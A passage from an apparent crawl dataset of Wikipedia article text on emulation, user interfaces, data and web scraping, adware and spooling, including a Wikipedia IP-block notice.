refresh cycle) to all types of documents and media". 11 He further states that this should not only apply to out of date systems, but also be upwardly mobile to future unknown systems. 12 Practically speaking, when a certain application is released in a new version, rather than address compatibility issues and migration for every digital object created in the previous version of that application, one could create an emulator for the application, allowing access to all of said digital objects. Because of its primary use of digital formats, new media art relies heavily on emulation as a preservation strategy. Artists such as Cory Arcangel specialize in resurrecting obsolete technologies in their artwork and recognize the importance of a decentralized and deinstitutionalized process for the preservation of digital culture. In many cases, the goal of emulation in new media art is to preserve a digital medium so that it can be saved indefinitely and reproduced without error, so that there is no reliance on hardware that ages and becomes obsolete. The paradox is that the emulation and the emulator have to be made to work on future computers. 13 Emulation techniques are commonly used during the design and development of new systems. It eases the development process by providing the ability to detect, recreate and repair flaws in the design even before the system is actually built. 14 It is particularly useful in the design of multi-core systems, where concurrency errors can be very difficult to detect and correct without the controlled environment provided by virtual hardware. 15 This also allows the software development to take place before the hardware is ready, 16 thus helping to validate design decisions and give a little more control. The word "emulator" was coined in 1963 at IBM 17 during development of the NPL (IBM System 360) product line, using a "new combination of software, microcode, and hardware". 18 They discovered that simulation using additional instructions implemented in microcode and hardware, instead of software simulation using only standard instructions, to execute programs written for earlier IBM computers dramatically increased simulation speed. Earlier, IBM provided simulators for, e.g., the 650 on the 705. 19 In addition to simulators, IBM had compatibility features on the 709 and 7090, 20 for which it provided the IBM 709 computer with a program to run legacy programs written for the IBM 704 on the 709 and later on the IBM 7090. This program used the instructions added by the compatibility feature 21 to trap instructions requiring special handling; all other 704 instructions ran the same on a 7090. The compatibility feature on the 1410 22 only required setting a console toggle switch, not a support program. In 1963, when microcode was first used to speed up this simulation process, IBM engineers coined the term "emulator" to describe the concept. In the 2000s, it has become common to use the word "emulate" in the context of software. However, before 1980, "emulation" referred only to emulation with a hardware or microcode assist, while "simulation" referred to pure software emulation. 23 For example, a computer specially built for running programs designed for another architecture is an emulator. In contrast, a simulator could be a program which runs on a PC, so that old Atari games can be simulated on it. Purists continue to insist on this distinction, but currently the term "emulation" often means the complete imitation of a machine executing binary code while "simulation" often refers to computer simulation, where a computer program is used to simulate an abstract model. Computer simulation is used in virtually every scientific and engineering domain and Computer Science is no exception, with several projects simulating abstract models of computer systems, such as network simulation, which both practically and semantically differs from network emulation. 24 Hardware virtualization is the virtualization of computers as complete hardware platforms, certain logical abstractions of their components, or only the functionality required to run various operating systems. Virtualization hides the physical characteristics of a computing platform from the users, presenting instead an abstract computing platform. 25 26 At its origins, the software that controlled virtualization was called a "control program", but the terms "hypervisor" or "virtual machine monitor" became preferred over time. 27 Each hypervisor can manage or run multiple virtual machines. |
398 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/User_interface | In the industrial design field of human computer interaction, a user interface (UI) is the space where interactions between humans and machines occur. The goal of this interaction is to allow effective operation and control of the machine from the human end, while the machine simultaneously feeds back information that aids the operators' decision-making process. Examples of this broad concept of user interfaces include the interactive aspects of computer operating systems, hand tools, heavy machinery operator controls and process controls. The design considerations applicable when creating user interfaces are related to, or involve such disciplines as, ergonomics and psychology. Generally, the goal of user interface design is to produce a user interface that makes it easy, efficient, and enjoyable (user-friendly) to operate a machine in the way which produces the desired result (i.e. maximum usability). This generally means that the operator needs to provide minimal input to achieve the desired output, and also that the machine minimizes undesired outputs to the user. User interfaces are composed of one or more layers, including a human-machine interface (HMI) that typically interfaces machines with physical input hardware (such as keyboards, mice, or game pads) and output hardware (such as computer monitors, speakers, and printers). A device that implements an HMI is called a human interface device (HID). User interfaces that dispense with the physical movement of body parts as an intermediary step between the brain and the machine use no input or output devices except electrodes alone; they are called brain computer interfaces (BCIs) or brain machine interfaces (BMIs). Other terms for human machine interfaces are man machine interface (MMI) and, when the machine in question is a computer, human computer interface. Additional UI layers may interact with one or more human senses, including: tactile UI (touch), visual UI (sight), auditory UI (sound), olfactory UI (smell), equilibria UI (balance), and gustatory UI (taste). Composite user interfaces (CUIs) are UIs that interact with two or more senses. The most common CUI is a graphical user interface (GUI), which is composed of a tactile UI and a visual UI capable of displaying graphics. When sound is added to a GUI, it becomes a multimedia user interface (MUI). There are three broad categories of CUI: standard, virtual and augmented. Standard CUI use standard human interface devices like keyboards, mice, and computer monitors. When the CUI blocks out the real world to create a virtual reality, the CUI is virtual and uses a virtual reality interface. When the CUI does not block out the real world and creates augmented reality, the CUI is augmented and uses an augmented reality interface. When a UI interacts with all human senses, it is called a qualia interface, named after the theory of qualia. citation needed CUI may also be classified by how many senses they interact with as either an X-sense virtual reality interface or X-sense augmented reality interface, where X is the number of senses interfaced with. For example, a Smell-O-Vision is a 3 sense (3S) Standard CUI with visual display, sound and smells; when virtual reality interfaces interface with smells and touch it is said to be a 4 sense (4S) virtual reality interface; and when augmented reality interfaces interface with smells and touch it is said to be a 4 sense (4S) augmented reality interface. The user interface or human machine interface is the part of the machine that handles the human machine interaction. Membrane switches, rubber keypads and touchscreens are examples of the physical part of the Human Machine Interface which we can see and touch. 1 In complex systems, the human machine interface is typically computerized. The term human computer interface refers to this kind of system. In the context of computing, the term typically extends as well to the software dedicated to control the physical elements used for human computer interaction. The engineering of human machine interfaces is enhanced by considering ergonomics (human factors). The corresponding disciplines are human factors engineering (HFE) and usability engineering (UE) which is part of systems engineering. Tools used for incorporating human factors in the interface design are developed based on knowledge of computer science, such as computer graphics, operating systems, programming languages. Nowadays, we use the expression graphical user interface for human machine interface on computers, as nearly all of them are now using graphics. citation needed Multimodal interfaces allow users to interact using more than one modality of user input. 2 There is a difference between a user interface and an operator interface or a human machine interface (HMI). In science fiction, HMI is sometimes used to refer to what is better described as a direct neural interface. However, this latter usage is seeing increasing application in the real-life use of (medical) prostheses—the artificial extension that replaces a missing body part (e.g., cochlear implants). 7 8 In some circumstances, computers might observe the user and react according to their actions without specific commands. A means of tracking parts of the body is required, and sensors noting the position of the head, direction of gaze and so on have been used experimentally. This is particularly relevant to immersive interfaces. 9 10 The history of user interfaces can be divided into the following phases according to the dominant type of user interface: In the batch era, computing power was extremely scarce and expensive. User interfaces were rudimentary. Users had to accommodate computers rather than the other way around; user interfaces were considered overhead, and software was designed to keep the processor at maximum utilization with as little overhead as possible. The input side of the user interfaces for batch machines was mainly punched cards or equivalent media like paper tape. The output side added line printers to these media. With the limited exception of the system operator's console, human beings did not interact with batch machines in real time at all. Submitting a job to a batch machine involved first preparing a deck of punched cards that described a program and its dataset. The program cards were not punched on the computer itself but on keypunches, specialized, typewriter-like machines that were notoriously bulky, unforgiving, and prone to mechanical failure. The software interface was similarly unforgiving, with very strict syntaxes designed to be parsed by the smallest possible compilers and interpreters. Once the cards were punched, one would drop them in a job queue and wait. Eventually, operators would feed the deck to the computer, perhaps mounting magnetic tapes to supply another dataset or helper software. The job would generate a printout, containing final results or an abort notice with an attached error log. Successful runs might also write a result on magnetic tape or generate some data cards to be used in a later computation. The turnaround time for a single job often spanned entire days. If one was very lucky, it might be hours; there was no real-time response. But there were worse fates than the card queue; some computers required an even more tedious and error-prone process of toggling in programs in binary code using console switches. The very earliest machines had to be partly rewired to incorporate program logic into themselves, using devices known as plugboards. Early batch systems gave the currently running job the entire computer; program decks and tapes had to include what we would now think of as operating system code to talk to I O devices and do whatever other housekeeping was needed. Midway through the batch period, after 1957, various groups began to experiment with so-called "load-and-go" systems. These used a monitor program which was always resident on the computer. Programs could call the monitor for services. Another function of the monitor was to do better error checking on submitted jobs, catching errors earlier and more intelligently and generating more useful feedback to the users. Thus, monitors represented the first step towards both operating systems and explicitly designed user interfaces. Command-line interfaces (CLIs) evolved from batch monitors connected to the system console. Their interaction model was a series of request-response transactions, with requests expressed as textual commands in a specialized vocabulary. Latency was far lower than for batch systems, dropping from days or hours to seconds. Accordingly, command-line systems allowed the user to change their mind about later stages of the transaction in response to real-time or near-real-time feedback on earlier results. Software could be exploratory and interactive in ways not possible before. But these interfaces still placed a relatively heavy mnemonic load on the user, requiring a serious investment of effort and learning time to master. 11 The earliest command-line systems combined teleprinters with computers, adapting a mature technology that had proven effective for mediating the transfer of information over wires between human beings. Teleprinters had originally been invented as devices for automatic telegraph transmission and reception; they had a history going back to 1902 and had already become well-established in newsrooms and elsewhere by 1920. In reusing them, economy was certainly a consideration, but psychology and the rule of least surprise mattered as well; teleprinters provided a point of interface with the system that was familiar to many engineers and users. The widespread adoption of video-display terminals (VDTs) in the mid 1970s ushered in the second phase of command-line systems. These cut latency further, because characters could be thrown on the phosphor dots of a screen more quickly than a printer head or carriage can move. They helped quell conservative resistance to interactive programming by cutting ink and paper consumables out of the cost picture, and were to the first TV generation of the late 1950s and 60s even more iconic and comfortable than teleprinters had been to the computer pioneers of the 1940s. Just as importantly, the existence of an accessible screen—a two-dimensional display of text that could be rapidly and reversibly modified—made it economical for software designers to deploy interfaces that could be described as visual rather than textual. The pioneering applications of this kind were computer games and text editors; close descendants of some of the earliest specimens, such as rogue(6), and vi(1), are still a live part of Unix tradition. In 1985, with the beginning of Microsoft Windows and other graphical user interfaces, IBM created what is called the Systems Application Architecture (SAA) standard which include the Common User Access (CUA) derivative. CUA successfully created what we know and use today in Windows, and most of the more recent DOS or Windows Console Applications will use that standard as well. This defined that a pulldown menu system should be at the top of the screen, status bar at the bottom, shortcut keys should stay the same for all common functionality (F2 to Open for example would work in all applications that followed the SAA standard). This greatly helped the speed at which users could learn an application so it caught on quick and became an industry standard. 12 Primary methods used in the interface design include prototyping and simulation. Typical human machine interface design consists of the following stages: interaction specification, interface software specification and prototyping: In broad terms, interfaces generally regarded as user friendly, efficient, intuitive, etc. are typified by one or more particular qualities. For the purpose of example, a non-exhaustive list of such characteristics follows: The principle of least astonishment (POLA) is a general principle in the design of all kinds of interfaces. It is based on the idea that human beings can only pay full attention to one thing at one time, 20 leading to the conclusion that novelty should be minimized. If an interface is used persistently, the user will unavoidably develop habits for using the interface. The designer's role can thus be characterized as ensuring the user forms good habits. If the designer is experienced with other interfaces, they will similarly develop habits, and often make unconscious assumptions regarding how the user will interact with the interface. 20 21 Peter Morville of Google designed the User Experience Honeycomb framework in 2004 when leading operations in user interface design. The framework was created to guide user interface design. It would act as a guideline for many web development students for a decade. 23 |
399 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=6 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Data scraping. |
400 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-6 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
401 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Adware | Adware, often called advertising-supported software by its developers, is software that generates revenue for its developer by automatically generating online advertisements in the user interface of the software or on a screen presented to the user during the installation process. The software may generate two types of revenue: one is for the display of the advertisement and another on a "pay-per-click" basis, if the user clicks on the advertisement. Some advertisements also act as spyware, 1 collecting and reporting data about the user, to be sold or used for targeted advertising or user profiling. The software may implement advertisements in a variety of ways, including a static box display, a banner display, a full screen, a video, a pop-up ad or in some other form. All forms of advertising carry health, ethical, privacy and security risks for users. The 2003 Microsoft Encyclopedia of Security and some other sources use the term "adware" differently: "any software that installs itself on your system without your knowledge and displays advertisements when the user browses the Internet", 2 i.e., a form of malware. Some software developers offer their software free of charge, and rely on revenue from advertising to recoup their expenses and generate income. Some also offer a version of the software at a fee without advertising. In legitimate software, the advertising functions are integrated into or bundled with the program. Adware is usually seen by the developer as a way to recover development costs, and generate revenue. In some cases, the developer may provide the software to the user free of charge or at a reduced price. The income derived from presenting advertisements to the user may allow or motivate the developer to continue to develop, maintain and upgrade the software product. 3 The use of advertising-supported software in business is becoming increasingly popular, with a third of IT and business executives in a 2007 survey by McKinsey Company planning to be using ad-funded software within the following two years. 4 Advertisement-funded software is also one of the business models for open-source software. Some software is offered in both an advertising-supported mode and a paid, advertisement-free mode. The latter is usually available by an online purchase of a license or registration code for the software that unlocks the mode, or the purchase and download of a separate version of the software. a Some software authors offer advertising-supported versions of their software as an alternative option to business organizations seeking to avoid paying large sums for software licenses, funding the development of the software with higher fees for advertisers. 8 Examples of advertising-supported software include Adblock Plus ("Acceptable Ads"), 9 the Windows version of the Internet telephony application Skype, 10 and the Amazon Kindle 3 family of e-book readers, which has versions called "Kindle with Special Offers" that display advertisements on the home page and in sleep mode in exchange for substantially lower pricing. 11 In 2012, Microsoft and its advertising division, Microsoft Advertising, b announced that Windows 8, the major release of the Microsoft Windows operating system, would provide built-in methods for software authors to use advertising support as a business model. 13 14 The idea had been considered since as early as 2005. 15 Most editions of Windows 10 include adware by default. 16 Support by advertising is a popular business model of software as a service (SaaS) on the Web. Notable examples include the email service Gmail 3 17 and other Google Workspace products (previously called Google Apps and G Suite), 4 and the social network Facebook. 18 19 Microsoft has also adopted the advertising-supported model for many of its social software SaaS offerings. 20 The Microsoft Office Live service was also available in an advertising-supported mode. 4 In the view of Federal Trade Commission staff, 21 there appears to be general agreement that software should be considered "spyware" only if it is downloaded or installed on a computer without the user's knowledge and consent. However, unresolved issues remain concerning how, what, and when consumers need to be told about software installed on their computers. For instance, distributors often disclose in an end-user license agreement that there is additional software bundled with primary software, but some participants did not view such disclosure as sufficient to infer consent. Much of the discussion on the topic involves the idea of informed consent, the assumption being that this standard eliminates any ethical issues with any given software's behavior. However, if a majority of important software, websites and devices were to adopt similar behavior and only the standard of informed consent is used, then logically a user's only recourse against that behavior would become not using a computer. The contract would become an ultimatum—agree or be ostracized from the modern world. This is a form of psychological coercion and presents an ethical problem with using implied or inferred consent as a standard. There are notable similarities between this situation and binding arbitration clauses which have become inevitable in contracts in the United States. Furthermore, certain forms and strategies of advertising have been shown to lead to psychological harm, especially in children. One example is childhood eating disorders—several studies have reported a positive association between exposure to beauty and fashion magazines and an increased level of weight concerns or eating disorder symptoms in girls. 22 The term adware is frequently used to describe a form of malware (malicious software) 23 24 which presents unwanted advertisements to the user of a computer. 25 26 The advertisements produced by adware are sometimes in the form of a pop-up, sometimes in an "unclosable window", and sometimes injected into web pages. 27 28 When the term is used in this way, the severity of its implication varies. While some sources rate adware only as an "irritant", 29 others classify it as an "online threat" 30 or even rate it as seriously as computer viruses and trojans. 31 The precise definition of the term in this context also varies. c Adware that observes the computer user's activities without their consent and reports it to the software's author is called spyware. 33 Adwares may collect the personal information of the user, causing privacy concerns. 34 However, most adware operates legally and some adware manufacturers have even sued antivirus companies for blocking adware. 35 Programs have been developed to detect, quarantine, and remove advertisement-displaying malware, including Ad-Aware, Malwarebytes' Anti-Malware, Spyware Doctor and Spybot Search Destroy. In addition, almost all commercial antivirus software currently detect adware and spyware, or offer a separate detection module. 36 A new wrinkle is adware that disables anti-malware and virus protection; technical remedies are available. 35 Adware has also been discovered in certain low-cost Android devices, particularly those made by small Chinese firms running on Allwinner systems-on-chip. There are even cases where adware code is embedded deep into files stored on the system and boot partitions, to which removal involves extensive (and complex) modifications to the firmware. 37 In recent years, machine-learning based systems have been implemented to detect malicious adware on Android devices by examining features in the flow of network traffic. 38 |
402 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Spooling | In computing, spooling is a specialized form of multi-programming for the purpose of copying data between different devices. In contemporary systems, a it is usually used for mediating between a computer application and a slow peripheral, such as a printer. Spooling allows programs to "hand off" work to be done by the peripheral and then proceed to other tasks, or to not begin until input has been transcribed. A dedicated program, the spooler, maintains an orderly sequence of jobs for the peripheral and feeds it data at its own rate. Conversely, for slow input peripherals, such as a card reader, a spooler can maintain a sequence of computational jobs waiting for data, starting each job when all of the relevant input is available; see batch processing. The spool itself refers to the sequence of jobs, or the storage area where they are held. In many cases, the spooler is able to drive devices at their full rated speed with minimal impact on other processing. Spooling is a combination of buffering and queueing. Nowadays, the most common use of spooling is printing: documents formatted for printing are stored in a queue at the speed of the computer, then retrieved and printed at the speed of the printer. Multiple processes can write documents to the spool without waiting, and can then perform other tasks, while the "spooler" process operates the printer. 1 For example, when a large organization prepares payroll cheques, the computation takes only a few minutes or even seconds, but the printing process might take hours. If the payroll program printed cheques directly, it would be unable to proceed to other computations until all the cheques were printed. Similarly, before spooling was added to PC operating systems, word processors were unable to do anything else, including interact with the user, while printing. Spooler or print management software often includes a variety of related features, such as allowing priorities to be assigned to print jobs, notifying users when their documents have been printed, distributing print jobs among several printers, selecting appropriate paper for each document, etc. A print server applies spooling techniques to allow many computers to share the same printer or group of printers. Print spoolers b can be configured to add a banner page, also called a burst page, job sheet, or printer separator, to the beginning and end of each document and job. These separate documents from each other, identify each document (e.g. with its title) and often also state who printed it (e.g. by username or job name). Banner pages are valuable in office environments where many people share a small number of printers. They are also valuable when a single job can produce multiple documents. Depending on the configuration, banner pages might be generated on each client computer, on a centralized print server, or by the printer itself. On printers using fanfold continuous forms a leading banner page would often be printed twice, so that one copy would always be face-up when the jobs were separated. The page might include lines printed over the fold, which would be visible along the edge of a stack of printed output, allowing the operator to easily separate the jobs. Some systems would also print a banner page at the end of each job, assuring users that they had collected all of their printout. Spooling is also used to mediate access to punched card readers and punches, magnetic tape drives, and other slow, sequential I O devices. It allows the application to run at the speed of the CPU while operating peripheral devices at their full rated speed. A batch processing system uses spooling to maintain a queue of ready-to-run tasks, which can be started as soon as the system has the resources to process them. Some store and forward messaging systems, such as uucp, used "spool" to refer to their inbound and outbound message queues, and this terminology is still found in the documentation for email and Usenet software. Peripheral devices have always been much slower than core processing units. This was an especially severe problem for early mainframes. For example, a job which read punched cards or generated printed output directly was forced to run at the speed of the slow mechanical devices. The first spooling programs, such as IBM's "SPOOL System" (7070 IO 076) copied data from punched cards to magnetic tape, and from tape back to punched cards and printers. Hard disks, which offered faster I O speeds and support for random access, started to replace the use of magnetic tape for spooling in the middle 1960s, and by the 1970s had largely replaced it altogether. Because the unit record equipment on IBM mainframes of the early 1960s was slow, it was common for larger systems to use a small offline computer such as an IBM 1401 instead of spooling. The term "spool" may originate with the Simultaneous Peripheral Operations On-Line 2 3 (SPOOL) software; 4 this derivation is uncertain, however. Simultaneous peripheral operations on-line may be a backronym. 5 verification needed Another explanation is that it refers to "spools" or reels of magnetic tape, although “spool” is an uncommon usage. |
403 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Australia | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse 